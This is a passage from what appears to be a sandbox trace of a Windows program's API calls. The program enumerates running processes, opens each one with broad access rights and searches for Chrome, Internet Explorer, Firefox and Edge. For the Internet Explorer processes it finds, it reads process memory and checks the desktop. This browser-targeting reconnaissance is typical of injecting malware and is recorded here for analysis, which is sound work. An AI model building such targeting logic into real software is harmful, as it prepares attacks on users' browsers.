	[0253.263] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.263] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0253.264] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa89c
	[0253.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.264] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0253.264] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.264] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.265] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0253.265] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.265] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.265] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0253.266] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa8a0
	[0253.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.266] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0253.266] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.266] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.267] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0253.267] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.267] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.267] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0253.268] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa8a4
	[0253.268] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.268] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0253.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.269] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.269] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0253.269] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.269] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.269] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0253.270] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa8a8
	[0253.270] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.270] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0253.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.271] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.272] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0253.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.272] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.272] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0253.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa8ac
	[0253.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.273] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0253.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.274] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.274] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0253.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.274] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.274] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0253.275] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa8b0
	[0253.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.275] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0253.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.276] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.276] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0253.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.276] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.277] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0253.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa8b4
	[0253.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.278] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0253.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.278] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.279] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0253.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.279] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.279] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0253.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa8b8
	[0253.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.280] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0253.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.281] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.281] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0253.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.281] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.281] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0253.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa8bc
	[0253.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.331] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0253.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.341] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.341] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0253.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.342] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.342] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0253.343] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa8c0
	[0253.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.343] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0253.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.343] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.344] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0253.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.344] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.344] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0253.345] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0xa8c4
	[0253.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.345] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0253.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.346] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.347] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0253.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.347] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.348] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0253.348] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0xa8c8
	[0253.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.348] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0253.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.349] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.349] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0253.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.350] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.350] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0253.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0xa8cc
	[0253.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.351] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0253.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.352] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.352] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0253.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.354] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.354] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0253.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0xa8d0
	[0253.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.355] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0253.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0253.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.356] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.357] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.358] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0xa8d4
	[0253.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.358] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.359] NtQueryInformationProcess (in: ProcessHandle=0xa8d4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.359] ReadProcessMemory (in: hProcess=0xa8d4, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.359] ReadProcessMemory (in: hProcess=0xa8d4, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.359] ReadProcessMemory (in: hProcess=0xa8d4, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.359] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.359] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0253.360] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0xa8d8
	[0253.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.360] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0253.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.361] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0253.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.361] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0253.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.361] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.361] NtQueryInformationProcess (in: ProcessHandle=0xa8d8, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0253.361] ReadProcessMemory (in: hProcess=0xa8d8, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0253.361] ReadProcessMemory (in: hProcess=0xa8d8, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0253.362] ReadProcessMemory (in: hProcess=0xa8d8, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0253.362] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0253.362] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0253.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0xa8dc
	[0253.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0253.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.363] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0253.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.364] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.364] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0253.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0xa8e0
	[0253.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.365] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0253.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.365] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.365] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0253.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.366] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0xa8e4
	[0253.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.367] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.367] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.368] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.368] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0xa8e8
	[0253.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.370] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.370] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.370] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.371] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.371] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0xa8ec
	[0253.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.372] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.372] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.372] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.373] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.373] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0253.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0xa8f0
	[0253.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.374] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0253.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.374] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.374] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0253.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.375] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.375] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
